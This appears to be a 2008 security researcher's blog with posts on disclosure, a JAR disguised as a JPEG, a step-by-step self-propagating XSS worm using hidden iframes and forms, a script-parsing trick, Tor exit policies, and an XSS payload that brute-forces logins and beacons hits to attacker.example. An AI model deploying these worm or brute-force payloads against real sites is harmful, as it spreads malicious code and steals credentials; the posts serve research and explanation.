Disclosure Truly is Dead

According to this eWeek article, Caught in a (Real) Security Bind, RealNetworks is unable to get information on the RealPlayer 11 vulnerability currently being offered by Gleg as part of their VulnDisco pack.

In a quote attributed to Chad Dougherty of Carnegie Mellon's CERT/CC:

We'd like to see the issue get fixed. We don't get into the politics of disclosure. Our objective is to get the information flowing in a way that end users are protected.

The sense of futility reminded me of Jeremiah Grossman's article Businesses must realize that full disclosure is dead. In it, he makes the following spot-on observation:

While ethics, morals, and professionalism should always be fundamental tenants of how professionals conduct themselves, it's irresponsible to design security strategies based on the assumption people will be. Business owners and software vendors have a responsibility for the data they protect and the products they sell. They must take into consideration the environment around them, understand that it's hostile, and be pragmatic in their approach. Have no expectation that anyone is going to share any vulnerability information ahead of time. Pray they will before going public, but do not depend on it and frankly, it's hopeless to demand it.

Vendors need to recognize that conducting proactive vulnerability research into their own products must be an integral part of the software development lifecycle. Find the vulnerabilities before someone else does. That has become the only way to stay ahead.

Posted by gfleischer on 2008/01/31 at 20:07 in Security

Java 1.6u4 and Some Old Hacks Revisited

Sun's Java SE 6 Update 4 was released a few weeks ago. It isn't currently showing up on java.com, but it can be downloaded directly from Sun: Java SE Downloads. Read the Java SE 6 Update 4 Release Notes.

There haven't been any specific security advisories posted by Sun, so this may have been a bug-fix-only release. Or maybe they are just waiting.

In any case, I thought it would make sense to revisit some old demonstrations I posted to see if they still worked:

Both of the online demos are still available and function just as before. So, it doesn't appear there were fixes or changes in either of these two areas.

The JAR file masquerading as an image still loads as an applet:

$ unzip -l jars.jpg
Archive:  jars.jpg
warning [jars.jpg]:  25336 extra bytes at beginning or within zipfile
  (attempting to process anyway)
  Length     Date   Time    Name
 --------    ----   ----    ----
        0  11-20-07 23:06   META-INF/
       68  11-20-07 23:06   META-INF/MANIFEST.MF
     3382  11-20-07 23:06   CorruptedApplet.class
 --------                   -------
     3450                   3 files
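
For reference, embedding it is nothing special; something along these lines should be enough to get the applet loaded (a sketch, with the class name taken from the listing above and arbitrary size attributes):

<!-- sketch: load the JAR-that-claims-to-be-a-JPEG as an applet archive -->
<applet code="CorruptedApplet.class" archive="jars.jpg" width="1" height="1">
</applet>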

Results from Linux using the URLConnection class and local proxy server:

[*] beginning demo
[*] Firefox detected
[*] Java is enabled
[*] LiveConnect present
[*] found Java plugin: Java(TM) Plug-in 1.6.0_04-b12 (libjavaplugin_oji.so)
[*] starting pwn
[*] requesting http://localhost.pseudo-flaw.net:80/
[*] demo completed

Results from Windows using the URLConnection class and local proxy server:

[*] beginning demo
[*] Firefox detected
[*] Java is enabled
[*] LiveConnect present
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava11.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava12.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava13.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava14.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjava32.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npoji610.dll)
[*] found Java plugin: Java(TM) Platform SE 6 U4 (npjpi160_04.dll)
[*] starting pwn
[*] requesting http://localhost.pseudo-flaw.net:80/
[*] demo completed

With the corresponding entry, complete with an arbitrary Referer, in the local web server's Apache logs:

127.0.0.1 - - [30/Jan/2008:05:46:22 -0000] "GET / HTTP/1.1" 200 5258 "http://www.google.com/search?q=pwned&btnI=I%27m+Feeling+Lucky" "Mozilla/4.0 (Linux 2.6.20-16-generic) Java/1.6.0_04 Paros/3.2.13" "-"
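
The demo itself boils down to a few LiveConnect calls from JavaScript. A rough sketch (not the exact demo code; the URL and Referer value here are only illustrative):

// sketch: java.net.URLConnection driven from JavaScript via LiveConnect
var url  = new java.net.URL("http://localhost.pseudo-flaw.net/");
var conn = url.openConnection();
// headers the browser would normally control can be set freely here
conn.setRequestProperty("Referer",
    "http://www.google.com/search?q=pwned&btnI=I%27m+Feeling+Lucky");
conn.connect();
var length = conn.getContentLength(); // reading a response field forces the request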

Wonder what the next Java update will bring?

Posted by gfleischer on 2008/01/30 at 00:29 in Hacking

IP Addresses are NOT Personal Information

The debate over whether Internet Protocol (IP version 4) addresses are personal information continues, as reported on the New York Times blog: Europe: Your I.P. Address Is Personal. It has since been commented on at Educated Guesswork (Uh, yeah IP addresses are identifying), and Adam Shostack has added it to his Adam's Law of Perversity in Computer Security.

Let's review a few quick facts about IP addresses:

  • IP addresses are not private
  • IP addresses are not anonymous
  • IP addresses do not uniquely identify a person
  • IP addresses do not uniquely identify a computer

Granted, an IP address may become identifying when it is stored in conjunction with other personal information, but by itself an IP address is not personally identifying information.

And to suddenly start talking about confidentiality and protecting your IP address (as if you own it) is simply ludicrous. By their very nature IP addresses cannot be private, because they are used to route data. Playing the privacy card for IP addresses is intellectually dishonest, and it detracts from real privacy arguments. It is disheartening to see so many people hopping on the "IP address is personal" bandwagon.

To quote LMH: It's called fanboyism, and it makes you kinda stupid.

Posted by gfleischer on 2008/01/29 at 20:52 in Rants

Top Ten Web Hacks of 2007 Results

The results are in: Top Ten Web Hacks of 2007. All good stuff.

My list in no particular order:

Posted by gfleischer on 2008/01/25 at 00:27 in Hacking

Another Magic Include Shell Sighting and Other Pwnage

A couple for my own reference.

Posted by gfleischer on 2008/01/24 at 20:26 in 0wned

Diminutive XSS Worms and IFRAMEs

The Diminutive XSS Worm Replication Contest finished up two weeks ago. See Diminutive Worm Contest Wrapup for the winners (Giorgio Maone and Sirdarckcat) and the details. RSnake posted an excellent paper that looks back at the contest and what was learned that could be used to stop XSS worms. I'll have more to say about the defense aspect later.

For all of the initial controversy, post-contest coverage was lighter than I expected:

Another thing I found fascinating is that in both RSnake's paper and the commentary, XMLHttpRequest was somehow preferred over form submission simply because it was "silent". (See Creating and Combating the Ultimate XSS Worm.) But as "bwb labs" rightly points out, there are situations where the form-submission approach would absolutely be required (e.g., cross-domain blind CSRF), and there are a variety of techniques for handling them. In fact, nearly trivial modifications can be made to support silent, one-time posting using forms. The approach is based on remote scripting with iframes (a popular technique from the pre-AJAX era).

To start with, we'll examine a contest entry from Gareth Heyes:

<form><input name="content"><iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit(alert('XSS',f.action=(f.method='post')+'.php'))">

The entry used a side-effect of the contest rules to reduce the number of bytes, so removing that will help show what is happening. It will no longer be diminutive, but the purpose here is to understand the behavior and not to create small worms.

Re-arranging the code, adding line breaks and removing the minimal payload:

<form method="post" action="post.php">
<input name="content">
<iframe onload="(f=parentNode)[0].value='<form>'+f.innerHTML;f.submit();">

Obviously, the revised code will no longer self-propagate, because the method and action from the form are not being reproduced. To address this, an additional parent-level element should be added. The favored solution from the contest was to use a b element and the bold() function, but empirical testing indicates that a div element seems to be more effective. Additionally, making the content input hidden and explicitly closing the form and iframe tags yields better results:

<div>
<form method="post" action="post.php">
<input name="content" type="hidden">
<iframe
	onload="(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;f.submit();">
</iframe>
</form>

Here is where some of the remote scripting techniques can be applied. By assigning a target to the form and a corresponding name to the iframe, the form can be made to submit into the iframe instead of the current window. So, we add a name to the iframe and a target to the form (plus a form name for good measure):

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;f.submit();">
</iframe>
</form>

This change will cause the form to submit into the iframe and leave the current page content unchanged. But an interesting problem is encountered if the content that has been submitted is echoed back. If this happens, an infinite loop has been constructed and the repeated posts will cause undue stress on the server.

To resolve this, the submitted content should check where it is running. One piece of information that the iframe has is the window.name value, which corresponds to the name on the iframe. By adding a check for the current window name, the code can determine whether it has already been submitted or not:

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('_t' != window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	}">
</iframe>
</form>

Unfortunately, this code suffers from a related problem. When the form submits into the iframe, the iframe's onload handler will fire again. This will happen repeatedly until the current page location is changed. To account for this, a guard variable is added:

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('undefined' == typeof(_o) ^ '_t' == window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	_o = 1;
	}">
</iframe>
</form>

The strange xor usage is done to avoid any '&' characters that may have additional encoding applied when innerHTML is used.

Finally, a CSS style is applied to hide the form and iframe. There are many ways to do this including "display: none" or "overflow: hidden" with zero height and width, but I prefer to use absolute positioning with large negative offsets. This style is applied to the form, so valid content can be included prior to it:

<div>
<i>Valid content goes <u>here</u></i>.
<form method="post" action="post.php" name="_f" target="_t"
      style="position: absolute; left: -9999px;">
<input name="content" type="hidden">
<iframe
	name="_t"
	onload="if ('undefined' == typeof(_o) ^ '_t' == window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	_o = 1;
	}">
</iframe>
</form>

Of course, a similar approach could be used to modify any of the entries that use img elements and onerror to trigger the form submission. An iframe would be added, assigned a name, and that name would be set as the target on the form.
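
As a rough sketch (not an actual contest entry), that modification might end up looking something like this:

<div>
<form method="post" action="post.php" name="_f" target="_t">
<input name="content" type="hidden">
<iframe name="_t"></iframe>
<img src="invalid"
	onerror="if ('undefined' == typeof(_o) ^ '_t' == window.name) {
	(f=parentNode)[0].value='<div>'+f.parentNode.innerHTML;
	f.submit();
	_o = 1;
	}">
</form>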

Hopefully, it is clear that form submission worms are still a threat that should be considered even though XMLHttpRequest may be the preferred approach. But if cross-domain submission is used as a protection mechanism, clever use of the IFRAME element can still make XSS worms a possibility.

If you are having a hard time visualizing how the propagation actually works, I've posted the code to my poorly crafted PHP application. It matches the constraints in the contest while supporting multiple users with minimal fuss: xss-worm-test-0.01.tar.gz (sig). You will need PHP and MySQL. See the README for more information. I would put this online myself, but it has obvious security holes; I would strongly recommend against putting this on a publicly accessible site.

Posted by gfleischer on 2008/01/24 at 19:54 in Hacking

Jeff Jones, Manufactured Controversy, and Yes, the SDL Works

Jeff Jones has recently released a new paper comparing vulnerability counts for Windows Vista in its first year with the equivalent time frame for Windows XP. The result is that Vista had fewer vulnerabilities in its first year than Windows XP did. Somehow that is not surprising given that XP was released prior to implementation of the Security Development Lifecycle (SDL).

In fact, if the vulnerability counts in Vista hadn't been significantly lower, the SDL would have been declared an abysmal failure and the Microsoft security employees would have slunk off meekly into the night. But this didn't happen, and that is a good thing. It lends credence to the idea that well-structured security software engineering and development processes work in reducing the total number of vulnerabilities.

Of course, after Jones' previous stinker of a paper (which I discussed here), there was bound to be controversy. You can watch the piling on in the usual places (ZDNet or Slashdot). There are the usual arguments about counts, methodologies and rhyming apple with orange. Trolling and flamebait at its finest. Fanbois and zealots arise.

But all of this serves to cloud the real issue. The comparisons between Windows, the Linux versions and Mac OS X aren't getting to the core of the problem. They are simply a distraction. Most people don't stand around pondering which operating system to buy based on which might be more secure. The choice of operating system has already been made for them. For most people, it is going to be some OEM version of Windows.

So maybe a more appropriate question to pose is: if one has to purchase a computer to run Windows, should it be Windows XP SP2 or Vista? That is where the Jones paper fails to reach its full potential. Comparing an outdated, unsupported Windows XP release with Vista while at the same time comparing Vista with Linux and Mac OS X just confuses the issue of assigning some sort of "best security" mantle.

There is significant value to be found in Jones' paper if it is read dispassionately. He has promised a more interesting work that includes the Days-of-Risk (DoR) metric for the products. Personally, I am looking forward to it, because it should help clarify how much exposure an individual user had to a given vulnerability. Unfixed vulnerabilities (not undiscovered vulnerabilities) are the basis for most risk faced by users.

I hope the DoR metrics are enlightening, because a careful reading of the side-by-side comparisons showed that Ubuntu LTS (reduced) had the fewest unfixed vulnerabilities in the first year. I find that an intriguing discrepancy given the paper's other conclusions about Windows Vista's security superiority.

Posted by gfleischer on 2008/01/24 at 13:50 in Security

Self-Referencing Content - When HTML Becomes Script

From the parlor tricks department:

/* <script src="#"></script> */
alert("It Works");

If this is parsed in an HTML context, the script tag will re-include the content and cause it to be interpreted as script. The only catch is that the HTML needs to also parse as valid JavaScript.

Try it out.

Interesting, but most likely useless. Anywhere that one could inject this, one could also probably inject arbitrary script.

Tested successfully with Mozilla Firefox, Safari, Opera and Internet Explorer 6 and 7. Opera has a weird quirk of only executing it once; later invocations treat the file as script and display the contents instead of executing. Forcing a refresh of the page causes it to be re-interpreted as HTML though.

And I could swear that I had seen this before, but I can't find any references on the web searching through Google. I'm probably not hitting on the correct keywords. If anybody knows where else this is referenced, send me a link and I'll include it.

Posted by gfleischer on 2008/01/23 at 11:52 in Quirks

XSS Vulnerabilities Can Be Used to Hack Servers

Recently, there has been some controversy surrounding ScanAlert's HackerSafe program with respect to its position on sites with XSS (cross-site scripting). This Information Week article gives the background. Essentially, ScanAlert believes that XSS vulnerabilities are only a threat to clients and/or their web browsers.

In the article, the following statement is made:

Pierini maintains that XSS vulnerabilities aren't material to a site's certification. "Cross-site scripting can't be used to hack a server," he said. "You may be able to do other things with it. You may be able to do things that affect the end-user or the client. But the customer data protected with the server, in the database, isn't going to be compromised by a cross-site scripting attack, not directly."

Claiming that XSS can't be used to hack a server is just a semantic distinction. Of course, ScanAlert has to take that position; otherwise, they would appear to be selling snake-oil site protection. I'm not passing any judgement on ScanAlert's mindset, but I would like to point out that XSS can be used to hack servers.

Any web-browser-based attack that an attacker could launch could be re-packaged as an XSS payload. Here are a few possible examples of using XSS to attack a server:

  • Brute-force login credentials
  • Server port-scanning
  • Data retrieval through SQL injection (SQLI)

When a user visits the site, the XSS payload would be launched and run in the context of the original site. Obviously, the same-origin policy allows the user's browser to connect back to the site, communicate with it via XMLHttpRequest, and potentially establish Java network sockets using LiveConnect. Clearly, these are all attacks against the server.
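
As a rough sketch of the first bullet above, an injected payload could quietly run a short credential-guessing loop against the site's own login handler. Everything specific here (the /login.php path, the parameter names, the "Welcome" success marker and the attacker.example logging host) is made up for illustration:

// hypothetical XSS payload: same-origin brute force of the login form
function report(xhr, user, pass) {
  return function () {
    if (xhr.readyState == 4 && xhr.responseText.indexOf("Welcome") != -1) {
      // phone the hit home to a third-party command-and-control host
      new Image().src = "http://attacker.example/log?u=" + escape(user) +
                        "&p=" + escape(pass);
    }
  };
}

var guesses = [["admin", "admin"], ["admin", "password"], ["root", "letmein"]];
for (var i = 0; i < guesses.length; i++) {
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/login.php", true);   // same origin, so nothing blocks it
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  xhr.onreadystatechange = report(xhr, guesses[i][0], guesses[i][1]);
  xhr.send("user=" + escape(guesses[i][0]) + "&pass=" + escape(guesses[i][1]));
}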

An attacker could remain extremely stealthy while conducting reconnaissance or attacking the server. By using many individual client web browsers as attack agents, the attacker never needs to connect to the site directly. With the addition of a third-party command-and-control site to coordinate across many clients, each user's web browser could be used to scan a single port on the server, attempt to log in with a few usernames or passwords, or retrieve a single row from the database using SQLI.

The reconnaissance or attack may go completely unnoticed, because by distributing the activity across a large number of clients, it has been spread out in both time and space. It would appear as a bunch of little, organic attacks, not as one big, coordinated attack. Heuristic-based IDS, IPS or DLP protections may never fire if the attack is subtle enough.

These aren't any new ideas (see "10 Quick Facts..." in this paper). Really these are the same old XSS attacks against LAN clients, but targeting the originating server instead. Just something to keep in mind when someone claims XSS can't be used to hack a server.

And for more excellent commentary see Jeremiah Grossman's comments as well as Jericho's (from attrition.org).

Posted by gfleischer on 2008/01/21 at 22:39 in Security

Tor 0.1.2.19 Released

Tor (The Onion Router) version 0.1.2.19 has been released. Download it here.

The release notes make mention of one security fix:

Exit policies now reject connections that are addressed to a relay's public (external) IP address too, unless ExitPolicyRejectPrivate is turned off. We do this because too many relays are running nearby to services that trust them based on network address.

The fix addresses an issue most recently discussed on the or-talk mailing list. Martin Fink posted a message Security concerns/help me understand tor that raised the issue of cheap home routers that provide access control based on LAN IP address ranges. The basic premise is that if a Tor exit node is NAT'd behind a cheap home router, any ports listening on the LAN side of the router may be exposed to Tor traffic. This situation arises for a couple of reasons.

The first reason is due to the nature of Internet routing. In a typical home network, packets destined for the external IP address of the gateway router that originate within the home network will be routed directly to the gateway router. These packets will arrive on the LAN interface even though they are addressed to the external IP address. If the router is performing authorization based on either the packet's source address or the interface the packet arrived on, it will appear as if this is legitimate LAN traffic. This holds true of any proxy-type system that is deployed on an internal network but accepts traffic from an external source.

The second reason is that Tor attempts to solve the exit-node eavesdropper problem by detecting whether you are going to an IP address that also has a Tor exit node running on it. If it detects this situation, Tor will construct a routing path that terminates at that IP address. The OnionRouterFAQ has an entry that describes this:

Tor does provide a partial solution in a very specific situation, though. When you make a connection to a destination that also runs a Tor relay, Tor will automatically extend your circuit so you exit from that circuit. So for example if Indymedia ran a Tor relay on the same IP address as their website, people using Tor to get to the Indymedia website would automatically exit from their Tor relay, thus getting *better* encryption and authentication properties than just browsing there the normal way.

But that behavior, combined with a NAT'd Tor server behind a cheap home router, raises an interesting problem.

For example, consider a home network router with an external IP address of 77.77.77.77 and an internal IP address of 192.168.0.1, and a Tor server NAT'd at 192.168.0.69. If Tor detects that a web user wants to visit the web page at IP address 77.77.77.77, the onion routing path will be constructed to exit at that IP address. When the Tor server running on 192.168.0.69 receives a packet to be routed to 77.77.77.77, it will treat it just like any other packet to exit. The server will decrypt it and forward it out. But since the Tor server is NAT'd to 192.168.0.69, when the packet is forwarded to the gateway router, the router will receive it on its LAN interface. If that LAN interface has a web server listening on it, that web server will respond. What if this is the administrative interface for the router and access restrictions are based on the origin of the packet? Any Tor user (that wanted to) could browse to the admin interface of the router and reconfigure it.

In general, Tor attempts to guard against relays sending locally addressed packets by automatically adding exit-policy reject rules for the RFC 1918 address space. The 0.1.2.19 update adds a reject rule to the exit policy for the external IP address of the Tor server. If the old behavior is desired, it would need to be configured manually.
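
For anyone who really wants the old behavior back, it amounts to flipping the option named in the release notes in the relay's torrc (shown here as a sketch; doing so re-opens exactly the exposure described above):

# torrc (exit relay) -- not recommended: this also re-allows exits to
# RFC 1918 addresses as well as to the relay's own public address
ExitPolicyRejectPrivate 0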

The change is important for those home users who don't understand the intricacies of network routing or use cheap gear that trusts packets based on where they originate. But given the relative prevalence of client-side browser exploits, that trust is probably misplaced to begin with.

Posted by gfleischer on 2008/01/19 at 20:33 in Tor

